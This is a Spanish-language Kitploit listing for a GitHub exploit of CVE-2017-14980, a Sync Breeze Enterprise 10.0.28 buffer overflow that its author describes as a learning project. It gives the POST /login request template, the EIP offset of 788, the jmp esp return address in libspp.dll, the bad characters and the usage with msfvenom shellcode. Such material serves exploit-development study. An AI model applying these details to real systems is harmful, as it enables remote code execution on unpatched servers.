Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-14980.RCE — Desbordamiento de búfer en Sync Breeze Enterprise 10.0.28 permite a atacantes remotos tener un impacto no especificado a través de un parámetro de nombre de usuario largo en /login | Kitploit
Herramientas/GitHubGitHub/damariion/cve-2017-14980.rce
ExplotaciónShellcodeExplotación de Aplicaciones WebDesarrollo de PayloadsExplotación de BinariosArchived
GitHubdamariion/cve-2017-14980.rce

CVE-2017-14980.RCE

Desbordamiento de búfer en Sync Breeze Enterprise 10.0.28 permite a atacantes remotos tener un impacto no especificado a través de un parámetro de nombre de usuario largo en /login

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2017-14980

El exploit apunta a Sync Breeze Enterprise ejecutándose en Windows 10 (x86, build: 16299), afectando la versión 10.0.28, donde un atacante no autenticado puede realizar un desbordamiento de búfer a través del cuerpo de una solicitud HTTP, resultando en ejecución de código arbitrario. Este exploit asume que todas las mitigaciones de seguridad están deshabilitadas (por ejemplo, ASLR, CFG, DEP).

[!NOTE] Este proyecto fue desarrollado mientras experimentaba con desbordamientos de búfer básicos dirigidos a binarios de Windows. Es el primer exploit que he desarrollado. El exploit es completamente funcional y se publica para documentar mi progreso en la investigación de vulnerabilidades y el desarrollo de exploits.

Pasos

  1. Enviar una solicitud HTTP
    La conexión se establece con los siguientes encabezados y cuerpo:

    root@kitploit:~
    POST /login HTTP/1.1
    Host: <host>
    Content-Type: application/x-www-form-urlencoded
    Content-Length: <payload-length>
    
    username=<payload>&password=?
    
  2. Sobrescribir el registro eip
    La dirección estática 10090c83 que apunta a una instrucción jmp esp en libspp.dll se utiliza para redirigir la ejecución a la pila en el desplazamiento de byte 788.

  3. Ejecutar el shellcode
    El shellcode configurado debe evitar los siguientes caracteres: \x00\x0a\x0d\x25\x26\x2b\x3d.

Gráfico

root@kitploit:~
graph
   
    subgraph "syncbreeze.exe"
        
        b1.0["   
            ...... 41414141
            ...... 41414141
            ...... 41414141
            (eip) <span style="color: cyan">10090c83</span>
        "]

        b1.1["    
            (<span style="color:lime">esp</span>) 90909090
            ...... 90909090
            <span style="color:red">&lt;shellcode&gt;</span>
        "]
        
        b1.0 ~~~ b1.1
    end
        
    subgraph "libspp.dll"
        
        a1.0["`
            (<span style="color:cyan">10090c83</span>) jmp <span style="color:lime">esp</span>
        `"]
    
    end 

    b1.0 --> a1.0
    a1.0 --> b1.1

Vista previa

preview

Uso

root@kitploit:~
python3 exploit.py --host <host> --port <port> --file <file>  
FlagDescripción
hostla interfaz en la que Sync Breeze está escuchando
portel puerto en el que Sync Breeze está escuchando
filela salida sin procesar de msfvenom
Descargar herramienta